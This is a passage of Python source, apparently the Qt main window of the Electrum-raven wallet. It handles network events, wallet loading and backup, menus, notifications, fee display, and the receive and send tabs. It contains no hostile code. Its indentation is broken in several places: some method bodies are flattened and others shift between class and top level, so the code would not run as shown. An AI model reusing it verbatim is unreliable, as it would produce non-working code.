                self.tx_notification_queue.put(tx)
        elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
            # Handle in GUI thread
            self.network_signal.emit(event, args)
        else:
            self.print_error("unexpected network message:", event, args)
    def on_network_qt(self, event, args=None):
        # Handle a network message in the GUI thread
        if event == 'status':
            self.update_status()
        elif event == 'banner':
            self.console.showMessage(args[0])
        elif event == 'verified':
            wallet, tx_hash, tx_mined_status = args
            if wallet == self.wallet:
                self.history_list.update_item(tx_hash, tx_mined_status)
        elif event == 'fee':
            if self.config.is_dynfee():
                self.fee_slider.update()
                self.do_update_fee()
        elif event == 'fee_histogram':
            if self.config.is_dynfee():
                self.fee_slider.update()
                self.do_update_fee()
            # todo: update only unconfirmed tx
            self.history_list.update()
        else:
            self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
    def close_wallet(self):
        """Log wallet closing and let plugins react via the close_wallet hook."""
        if self.wallet:
            self.print_error('close_wallet', self.wallet.storage.path)
        run_hook('close_wallet', self.wallet)
    @profiler
    def load_wallet(self, wallet):
        """Attach a wallet to this window and initialize all wallet-driven UI."""
        wallet.thread = TaskThread(self, self.on_error)
        self.update_recently_visited(wallet.storage.path)
        # update(==init) all tabs; expensive for large wallets..
        # so delay it somewhat, hence __init__ can finish and the window can appear sooner
        QTimer.singleShot(50, self.update_tabs)
        self.need_update.set()
        # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
        # update menus
        self.seed_menu.setEnabled(self.wallet.has_seed())
        self.update_lock_icon()
        self.update_buttons_on_seed()
        self.update_console()
        self.clear_receive_tab()
        self.request_list.update()
        self.tabs.show()
        self.init_geometry()
        if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
            self.hide()
        else:
            self.show()
        self.watching_only_changed()
        run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
    def watching_only_changed(self):
        """Refresh the window title and key-related menu items for the
        wallet's watching-only status."""
        name = "Electrum-raven Testnet" if constants.net.TESTNET else "Electrum-raven"
        title = '%s %s - %s' % (name, ELECTRUM_VERSION,
                                self.wallet.basename())
        extra = [self.wallet.storage.get('wallet_type', '?')]
        if self.wallet.is_watching_only():
            self.warn_if_watching_only()
            extra.append(_('watching only'))
        title += ' [%s]'% ', '.join(extra)
        self.setWindowTitle(title)
        # menu items depend on what key material this wallet actually holds
        self.password_menu.setEnabled(self.wallet.may_have_password())
        self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
        self.import_address_menu.setVisible(self.wallet.can_import_address())
        self.export_menu.setEnabled(self.wallet.can_export())
    def warn_if_watching_only(self):
        """Pop a warning dialog if this wallet cannot spend (watching-only)."""
        if self.wallet.is_watching_only():
            msg = ' '.join([
                _("This wallet is watching-only."),
                _("This means you will not be able to spend Bitcoins with it."),
                _("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
            ])
            self.show_warning(msg, title=_('Information'))
    def open_wallet(self):
        """Let the user pick a wallet file and open it in a new window."""
        try:
            wallet_folder = self.get_wallet_folder()
        except FileNotFoundError as e:
            self.show_error(str(e))
            return
        filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
        if not filename:
            # user cancelled the dialog
            return
        self.gui_object.new_window(filename)
    def backup_wallet(self):
        """Copy the current wallet file to a user-chosen destination."""
        path = self.wallet.storage.path
        wallet_folder = os.path.dirname(path)
        filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
        if not filename:
            # user cancelled the dialog
            return
        new_path = os.path.join(wallet_folder, filename)
        if new_path != path:
            try:
                # copy2 preserves file metadata
                shutil.copy2(path, new_path)
                self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
            except BaseException as reason:
                self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
    def update_recently_visited(self, filename):
        """Move `filename` to the top of the recently-open list (max 5 entries)
        and rebuild the corresponding menu with Ctrl+1..5 shortcuts."""
        recent = self.config.get('recently_open', [])
        try:
            # sanity check: a corrupt config value that isn't sortable is discarded
            sorted(recent)
        except:
            recent = []
        if filename in recent:
            recent.remove(filename)
        recent.insert(0, filename)
        # drop entries whose files no longer exist
        recent = [path for path in recent if os.path.exists(path)]
        recent = recent[:5]
        self.config.set_key('recently_open', recent)
        self.recently_visited_menu.clear()
        for i, k in enumerate(sorted(recent)):
            b = os.path.basename(k)
            def loader(k):
                # closure factory: binds k per menu entry (avoids late binding)
                return lambda: self.gui_object.new_window(k)
            self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
        self.recently_visited_menu.setEnabled(len(recent))
    def get_wallet_folder(self):
        # directory containing the currently configured wallet file
        return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
    """Build the main-window menu bar: File, Wallet, View, Tools, Help.

    Several actions are stored as attributes (password_menu, seed_menu,
    export_menu, ...) so other code can enable/disable them depending on
    the wallet's capabilities.
    """
    menubar = QMenuBar()
    # File menu: open/new/backup/delete wallet, plus the recent-files submenu.
    file_menu = menubar.addMenu(_("&File"))
    self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
    file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
    file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
    file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
    file_menu.addAction(_("Delete"), self.remove_wallet)
    file_menu.addSeparator()
    file_menu.addAction(_("&Quit"), self.close)
    wallet_menu = menubar.addMenu(_("&Wallet"))
    wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
    wallet_menu.addSeparator()
    self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
    self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
    self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
    self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
    self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
    self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
    self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
    wallet_menu.addSeparator()
    addresses_menu = wallet_menu.addMenu(_("&Addresses"))
    addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
    labels_menu = wallet_menu.addMenu(_("&Labels"))
    labels_menu.addAction(_("&Import"), self.do_import_labels)
    labels_menu.addAction(_("&Export"), self.do_export_labels)
    history_menu = wallet_menu.addMenu(_("&History"))
    history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
    history_menu.addAction(_("&Summary"), self.history_list.show_summary)
    history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
    history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
    contacts_menu = wallet_menu.addMenu(_("Contacts"))
    contacts_menu.addAction(_("&New"), self.new_contact_dialog)
    contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
    contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
    invoices_menu = wallet_menu.addMenu(_("Invoices"))
    invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
    invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
    wallet_menu.addSeparator()
    wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
    # View menu: one show/hide toggle per optional tab.
    def add_toggle_action(view_menu, tab):
        is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
        item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
        tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
    view_menu = menubar.addMenu(_("&View"))
    add_toggle_action(view_menu, self.addresses_tab)
    add_toggle_action(view_menu, self.utxo_tab)
    add_toggle_action(view_menu, self.contacts_tab)
    add_toggle_action(view_menu, self.console_tab)
    tools_menu = menubar.addMenu(_("&Tools"))
    # Settings / Preferences are all reserved keywords in macOS using this as work around
    tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
    tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
    tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
    tools_menu.addSeparator()
    tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
    tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
    tools_menu.addSeparator()
    paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
    raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
    raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
    raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
    raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
    raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
    self.raw_transaction_menu = raw_transaction_menu
    # Let plugins append their own entries to the Tools menu.
    run_hook('init_menubar_tools', self, tools_menu)
    help_menu = menubar.addMenu(_("&Help"))
    help_menu.addAction(_("&About"), self.show_about)
    help_menu.addAction(_("&RVN Electrum Wiki"), lambda: webbrowser.open("https://raven.wiki/wiki/Electrum"))
    help_menu.addAction(_("&Ravencoin.org"), lambda: webbrowser.open("https://Ravencoin.org"))
    help_menu.addSeparator()
    help_menu.addAction(_("&Report Bug"), self.show_report_bug)
    help_menu.addSeparator()
    help_menu.addAction(_("&Donate to server"), self.donate_to_server)
    self.setMenuBar(menubar)
def donate_to_server(self):
    """Pay to the current server's donation address, if it advertises one."""
    addr = self.network.get_donation_address()
    if not addr:
        self.show_error(_('No donation address for this server'))
        return
    host = self.network.get_parameters().host
    self.pay_to_URI('ravencoin:%s?message=donation for %s'%(addr, host))
def show_about(self):
    """Display the About dialog with the application version and credits."""
    QMessageBox.about(self, "Electrum-rvn",
        (_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
            _("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
            _("You do not need to perform regular backups, because your wallet can be "
              "recovered from a secret phrase that you can memorize or write on paper.") + " " +
            _("Startup times are instant because it operates in conjunction with high-performance "
              "servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
            _("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
    """Show a message box pointing users at the GitHub issue tracker."""
    msg = ' '.join([
        _("Please report any bugs as issues on github:<br/>"),
        "<a href=\"https://github.com/traysi/electrum-raven/issues\">https://github.com/traysi/electrum-raven/issues</a><br/><br/>",
        _("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
        _("Try to explain not only what the bug is, but how it occurs.")
    ])
    self.show_message(msg, title="Electrum - " + _("Reporting Bugs"))
def notify_transactions(self):
    """Drain queued incoming transactions and show desktop notifications.

    Skipped while the wallet is syncing, and rate-limited to one batch
    every 20 seconds. Three or more transactions are combined into a
    single summary notification.
    """
    if self.tx_notification_queue.qsize() == 0:
        return
    if not self.wallet.up_to_date:
        return  # no notifications while syncing
    now = time.time()
    rate_limit = 20  # seconds
    if self.tx_notification_last_time + rate_limit > now:
        return
    self.tx_notification_last_time = now
    self.print_error("Notifying GUI about new transactions")
    drained = []
    try:
        while True:
            drained.append(self.tx_notification_queue.get_nowait())
    except queue.Empty:
        pass
    if len(drained) >= 3:
        # Combine the transactions into one summary notification.
        total_received = 0
        for tx in drained:
            is_relevant, _is_mine, delta, _fee = self.wallet.get_wallet_delta(tx)
            if is_relevant:
                total_received += delta
        self.notify(_("{} new transactions received: Total amount received in the new transactions {}")
                    .format(len(drained), self.format_amount_and_units(total_received)))
    else:
        for tx in drained:
            is_relevant, _is_mine, delta, _fee = self.wallet.get_wallet_delta(tx)
            if is_relevant:
                self.notify(_("New transaction received: {}").format(self.format_amount_and_units(delta)))
def notify(self, message):
    """Show *message* as a system-tray balloon, if a tray icon exists."""
    if not self.tray:
        return
    try:
        # The QIcon overload requires Qt 5.9; older bindings raise TypeError.
        self.tray.showMessage("Electrum-rvn", message, QIcon(":icons/electrum_dark_icon"), 20000)
    except TypeError:
        self.tray.showMessage("Electrum-rvn", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter=""):
    """Open-file dialog that starts in, and remembers, the last used directory."""
    last_dir = self.config.get('io_dir', os.path.expanduser('~'))
    chosen, _selected_filter = QFileDialog.getOpenFileName(self, title, last_dir, filter)
    if chosen and os.path.dirname(chosen) != last_dir:
        self.config.set_key('io_dir', os.path.dirname(chosen), True)
    return chosen
def getSaveFileName(self, title, filename, filter=""):
    """Save-file dialog seeded with *filename*, remembering the chosen directory."""
    last_dir = self.config.get('io_dir', os.path.expanduser('~'))
    suggested = os.path.join(last_dir, filename)
    chosen, _selected_filter = QFileDialog.getSaveFileName(self, title, suggested, filter)
    if chosen and os.path.dirname(chosen) != last_dir:
        self.config.set_key('io_dir', os.path.dirname(chosen), True)
    return chosen
def connect_slots(self, sender):
    # Drive periodic GUI maintenance (see timer_actions) from the app-wide timer.
    sender.timer_signal.connect(self.timer_actions)
def timer_actions(self):
    """Periodic maintenance: refresh wallet views, resolve pay-to aliases,
    recompute the fee if flagged, and flush pending tx notifications."""
    # Note this runs in the GUI thread
    if self.need_update.is_set():
        self.need_update.clear()
        self.update_wallet()
    # resolve aliases
    # FIXME this is a blocking network call that has a timeout of 5 sec
    self.payto_e.resolve()
    # update fee
    if self.require_fee_update:
        self.do_update_fee()
        self.require_fee_update = False
    self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
    """Format a satoshi amount using the configured precision and unit."""
    return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
    """Render *amount* with its unit, plus a fiat equivalent when FX is active."""
    text = self.format_amount(amount) + ' ' + self.base_unit()
    fiat = self.fx.format_amount_and_units(amount) if self.fx else None
    if text and fiat:
        text += ' (%s)' % fiat
    return text
def format_fee_rate(self, fee_rate):
    # fee_rate is sat/kB; display as sat/byte.
    return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
    """Return the configured decimal precision for coin amounts."""
    return self.decimal_point
def base_unit(self):
    """Return the display unit name for the configured decimal point."""
    return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
    """Keep a coin amount field and a fiat field in sync via the FX rate.

    The 'follows' flag on each edit suppresses the echo when one field
    programmatically updates the other, preventing infinite recursion
    between the two textChanged handlers.
    """
    def edit_changed(edit):
        if edit.follows:
            return
        edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
        fiat_e.is_last_edited = (edit == fiat_e)
        amount = edit.get_amount()
        rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
        if rate.is_nan() or amount is None:
            # No conversion possible: blank the opposite field(s).
            if edit is fiat_e:
                btc_e.setText("")
                if fee_e:
                    fee_e.setText("")
            else:
                fiat_e.setText("")
        else:
            if edit is fiat_e:
                btc_e.follows = True
                btc_e.setAmount(int(amount / Decimal(rate) * COIN))
                # Blue stylesheet marks an auto-filled value.
                btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                btc_e.follows = False
                if fee_e:
                    window.update_fee()
            else:
                fiat_e.follows = True
                fiat_e.setText(self.fx.ccy_amount_str(
                    amount * Decimal(rate) / COIN, False))
                fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                fiat_e.follows = False
    btc_e.follows = False
    fiat_e.follows = False
    fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
    btc_e.textChanged.connect(partial(edit_changed, btc_e))
    fiat_e.is_last_edited = False
def update_status(self):
    """Refresh the status-bar balance text, tray tooltip and network icon."""
    if not self.wallet:
        return
    if self.network is None:
        text = _("Offline")
        icon = QIcon(":icons/status_disconnected.png")
    elif self.network.is_connected():
        server_height = self.network.get_server_height()
        server_lag = self.network.get_local_height() - server_height
        # Suffix for alternate icons when multiple chain forks are known.
        fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
        # Server height can be 0 after switching to a new server
        # until we get a headers subscription request response.
        # Display the synchronizing message in that case.
        if not self.wallet.up_to_date or server_height == 0:
            text = _("Synchronizing...")
            icon = QIcon(":icons/status_waiting.png")
        elif server_lag > 1:
            text = _("Server is lagging ({} blocks)").format(server_lag)
            icon = QIcon(":icons/status_lagging%s.png"%fork_str)
        else:
            # confirmed / unconfirmed / unmatured balances
            c, u, x = self.wallet.get_balance()
            text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
            if u:
                text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
            if x:
                text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
            # append fiat balance and price
            if self.fx.is_enabled():
                text += self.fx.get_fiat_status_text(c + u + x,
                    self.base_unit(), self.get_decimal_point()) or ''
            if not self.network.proxy:
                icon = QIcon(":icons/status_connected%s.png"%fork_str)
            else:
                icon = QIcon(":icons/status_connected_proxy%s.png"%fork_str)
    else:
        if self.network.proxy:
            text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
        else:
            text = _("Not connected")
        icon = QIcon(":icons/status_disconnected.png")
    self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
    self.balance_label.setText(text)
    self.status_button.setIcon( icon )
def update_wallet(self):
    """Refresh the status bar, and the tab views unless a sync is in flight."""
    self.update_status()
    if not self.wallet.up_to_date:
        # Still syncing: only skip the tab refresh while actually connected.
        if self.network and self.network.is_connected():
            return
    self.update_tabs()
def update_tabs(self):
    """Repaint every data-driven list view and refresh pay-to completions."""
    views = (self.history_list, self.request_list, self.address_list,
             self.utxo_list, self.contact_list, self.invoice_list)
    for view in views:
        view.update()
    self.update_completions()
def create_history_tab(self):
    """Build the History tab: a HistoryList with its optional filter toolbar."""
    from .history_list import HistoryList
    self.history_list = l = HistoryList(self)
    # The list is its own search target for the Ctrl+F search box.
    l.searchable_list = l
    toolbar = l.create_toolbar(self.config)
    toolbar_shown = self.config.get('show_toolbar_history', False)
    l.show_toolbar(toolbar_shown)
    return self.create_list_tab(l, toolbar)
def show_address(self, addr):
    """Open the modal detail dialog for *addr*."""
    from . import address_dialog
    dialog = address_dialog.AddressDialog(self, addr)
    dialog.exec_()
def show_transaction(self, tx, tx_desc = None):
    '''tx_desc is set only for txs created in the Send tab'''
    show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
    """Build the Receive tab: address/description/amount form, expiry
    selector, QR preview and the saved-requests list."""
    # A 4-column grid layout. All the stretch is in the last column.
    # The exchange rate plugin adds a fiat widget in column 2
    self.receive_grid = grid = QGridLayout()
    grid.setSpacing(8)
    grid.setColumnStretch(3, 1)
    self.receive_address_e = ButtonsLineEdit()
    self.receive_address_e.addCopyButton(self.app)
    self.receive_address_e.setReadOnly(True)
    msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
    self.receive_address_label = HelpLabel(_('Receiving address'), msg)
    self.receive_address_e.textChanged.connect(self.update_receive_qr)
    self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
    grid.addWidget(self.receive_address_label, 0, 0)
    grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
    self.receive_message_e = QLineEdit()
    grid.addWidget(QLabel(_('Description')), 1, 0)
    grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
    self.receive_message_e.textChanged.connect(self.update_receive_qr)
    self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
    grid.addWidget(QLabel(_('Requested amount')), 2, 0)
    grid.addWidget(self.receive_amount_e, 2, 1)
    self.receive_amount_e.textChanged.connect(self.update_receive_qr)
    # Optional fiat mirror of the requested amount (hidden when FX is off).
    self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
    if not self.fx or not self.fx.is_enabled():
        self.fiat_receive_e.setVisible(False)
    grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
    self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
    self.expires_combo = QComboBox()
    self.expires_combo.addItems([i[0] for i in expiration_values])
    self.expires_combo.setCurrentIndex(3)
    self.expires_combo.setFixedWidth(self.receive_amount_e.width())
    msg = ' '.join([
        _('Expiration date of your request.'),
        _('This information is seen by the recipient if you send them a signed payment request.'),
        _('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
        _('The bitcoin address never expires and will always be part of this electrum wallet.'),
    ])
    grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
    grid.addWidget(self.expires_combo, 3, 1)
    # Read-only label shown instead of the combo for saved requests.
    self.expires_label = QLineEdit('')
    self.expires_label.setReadOnly(1)
    self.expires_label.setFocusPolicy(Qt.NoFocus)
    self.expires_label.hide()
    grid.addWidget(self.expires_label, 3, 1)
    self.save_request_button = QPushButton(_('Save'))
    self.save_request_button.clicked.connect(self.save_payment_request)
    self.new_request_button = QPushButton(_('New'))
    self.new_request_button.clicked.connect(self.new_payment_request)
    # Clicking the QR widget opens the detachable QR window.
    self.receive_qr = QRCodeWidget(fixedSize=200)
    self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
    self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
    self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
    self.receive_buttons = buttons = QHBoxLayout()
    buttons.addStretch(1)
    buttons.addWidget(self.save_request_button)
    buttons.addWidget(self.new_request_button)
    grid.addLayout(buttons, 4, 1, 1, 2)
    self.receive_requests_label = QLabel(_('Requests'))
    from .request_list import RequestList
    self.request_list = RequestList(self)
    # layout
    vbox_g = QVBoxLayout()
    vbox_g.addLayout(grid)
    vbox_g.addStretch()
    hbox = QHBoxLayout()
    hbox.addLayout(vbox_g)
    hbox.addWidget(self.receive_qr)
    w = QWidget()
    w.searchable_list = self.request_list
    vbox = QVBoxLayout(w)
    vbox.addLayout(hbox)
    vbox.addStretch(1)
    vbox.addWidget(self.receive_requests_label)
    vbox.addWidget(self.request_list)
    vbox.setStretchFactor(self.request_list, 1000)
    return w
def delete_payment_request(self, addr):
    """Remove the saved request at *addr* and reset the Receive tab."""
    self.wallet.remove_payment_request(addr, self.config)
    self.request_list.update()
    self.clear_receive_tab()
def get_request_URI(self, addr):
    """Build the payment URI for the stored request at *addr*, including
    optional time/expiry and signed-name query parameters."""
    req = self.wallet.receive_requests[addr]
    message = self.wallet.labels.get(addr, '')
    URI = util.create_URI(addr, req['amount'], message)
    extras = ''
    if req.get('time'):
        extras += "&time=%d" % req.get('time')
    if req.get('exp'):
        extras += "&exp=%d" % req.get('exp')
    if req.get('name') and req.get('sig'):
        sig = bitcoin.base_encode(bfh(req.get('sig')), base=58)
        extras += "&name=" + req['name'] + "&sig=" + sig
    return str(URI + extras)
def sign_payment_request(self, addr):
    """Sign the request at *addr* with the configured alias key, if any.

    Silently does nothing when no alias is configured or the alias
    address does not belong to this wallet.
    """
    alias = self.config.get('alias')
    alias_privkey = None
    if alias and self.alias_info:
        alias_addr, alias_name, validated = self.alias_info
        if alias_addr:
            if self.wallet.is_mine(alias_addr):
                msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
                password = None
                if self.wallet.has_keystore_encryption():
                    password = self.password_dialog(msg)
                    # User cancelled the password prompt: abort signing.
                    if not password:
                        return
                try:
                    self.wallet.sign_payment_request(addr, alias, alias_addr, password)
                except Exception as e:
                    self.show_error(str(e))
                    return
            else:
                return
def save_payment_request(self):
    """Persist the current Receive-tab form as a payment request.

    Returns False when neither a message nor an amount was entered.
    """
    addr = str(self.receive_address_e.text())
    amount = self.receive_amount_e.get_amount()
    message = self.receive_message_e.text()
    if not message and not amount:
        self.show_error(_('No message or amount'))
        return False
    i = self.expires_combo.currentIndex()
    # Map the combo index to its expiration value (seconds or None).
    expiration = list(map(lambda x: x[1], expiration_values))[i]
    req = self.wallet.make_payment_request(addr, amount, message, expiration)
    try:
        self.wallet.add_payment_request(req, self.config)
    except Exception as e:
        traceback.print_exc(file=sys.stderr)
        self.show_error(_('Error adding payment request') + ':\n' + str(e))
    else:
        self.sign_payment_request(addr)
        self.save_request_button.setEnabled(False)
    finally:
        # Refresh views whether or not saving succeeded.
        self.request_list.update()
        self.address_list.update()
def view_and_paste(self, title, msg, data):
    """Show *data* in a modal dialog with a QR view and a copy button."""
    dialog = WindowModalDialog(self, title)
    vbox = QVBoxLayout()
    label = QLabel(msg)
    label.setWordWrap(True)
    vbox.addWidget(label)
    pr_e = ShowQRTextEdit(text=data)
    vbox.addWidget(pr_e)
    vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
    dialog.setLayout(vbox)
    dialog.exec_()
def export_payment_request(self, addr):
    """Serialize the payment request at *addr* as BIP70 and save it to disk."""
    req = self.wallet.receive_requests.get(addr)
    pr_bytes = paymentrequest.serialize_request(req).SerializeToString()
    default_name = req['id'] + '.bip70'
    path = self.getSaveFileName(_("Select where to save your payment request"), default_name, "*.bip70")
    if not path:
        return
    with open(path, "wb+") as f:
        f.write(util.to_bytes(pr_bytes))
    self.show_message(_("Request saved successfully"))
    self.saved = True
def new_payment_request(self):
    """Point the Receive tab at a fresh unused address, creating one
    (after confirmation) when the gap limit has been exhausted."""
    addr = self.wallet.get_unused_address()
    if addr is None:
        # Non-deterministic wallets cannot derive new addresses at all.
        if not self.wallet.is_deterministic():
            msg = [
                _('No more addresses in your wallet.'),
                _('You are using a non-deterministic wallet, which cannot create new addresses.'),
                _('If you want to create new addresses, use a deterministic wallet instead.')
            ]
            self.show_message(' '.join(msg))
            return
        if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
            return
        addr = self.wallet.create_new_address(False)
    self.set_receive_address(addr)
    self.expires_label.hide()
    self.expires_combo.show()
    self.new_request_button.setEnabled(False)
    self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
    """Show *addr* in the Receive tab and clear the message/amount fields."""
    self.receive_address_e.setText(addr)
    self.receive_message_e.setText('')
    self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
    """Reset the Receive tab to the wallet's default receiving address."""
    addr = self.wallet.get_receiving_address() or ''
    self.receive_address_e.setText(addr)
    self.receive_message_e.setText('')
    self.receive_amount_e.setAmount(None)
    self.expires_label.hide()
    self.expires_combo.show()
def toggle_qr_window(self):
    """Show or hide the detachable QR window, preserving its geometry
    across hide/show cycles."""
    from . import qrwindow
    if not self.qr_window:
        # First use: create the window lazily.
        self.qr_window = qrwindow.QR_Window(self)
        self.qr_window.setVisible(True)
        self.qr_window_geometry = self.qr_window.geometry()
    else:
        if not self.qr_window.isVisible():
            self.qr_window.setVisible(True)
            self.qr_window.setGeometry(self.qr_window_geometry)
        else:
            # Remember where the user left it before hiding.
            self.qr_window_geometry = self.qr_window.geometry()
            self.qr_window.setVisible(False)
    self.update_receive_qr()
def show_send_tab(self):
    """Switch the main tab widget to the Send tab."""
    self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
    """Switch the main tab widget to the Receive tab."""
    self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
    """Open the Receive tab pre-filled with *addr* (ignores invalid input)."""
    if not bitcoin.is_address(addr):
        return
    self.show_receive_tab()
    self.receive_address_e.setText(addr)
    self.new_request_button.setEnabled(True)
def update_receive_qr(self):
    """Regenerate the Receive-tab QR code from the current form fields."""
    addr = str(self.receive_address_e.text())
    amount = self.receive_amount_e.get_amount()
    message = self.receive_message_e.text()
    # A request is only saveable once it has an amount or a message.
    self.save_request_button.setEnabled((amount is not None) or (message != ""))
    uri = util.create_URI(addr, amount, message)
    self.receive_qr.setData(uri)
    # Keep the detached QR window in sync when it is open.
    if self.qr_window and self.qr_window.isVisible():
        self.qr_window.set_content(addr, amount, message, uri)
def set_feerounding_text(self, num_satoshis_added):
    """Store the tooltip text explaining the fee-rounding adjustment."""
    self.feerounding_text = (_('Additional {} satoshis are going to be added.')
                             .format(num_satoshis_added))
def create_send_tab(self):
    """Build the Send tab: pay-to/description/amount form, the linked
    fee/feerate/slider controls, action buttons and the invoice list."""
    # A 4-column grid layout. All the stretch is in the last column.
    # The exchange rate plugin adds a fiat widget in column 2
    self.send_grid = grid = QGridLayout()
    grid.setSpacing(8)
    grid.setColumnStretch(3, 1)
    from .paytoedit import PayToEdit
    self.amount_e = BTCAmountEdit(self.get_decimal_point)
    self.payto_e = PayToEdit(self)
    msg = _('Recipient of the funds.') + '\n\n'\
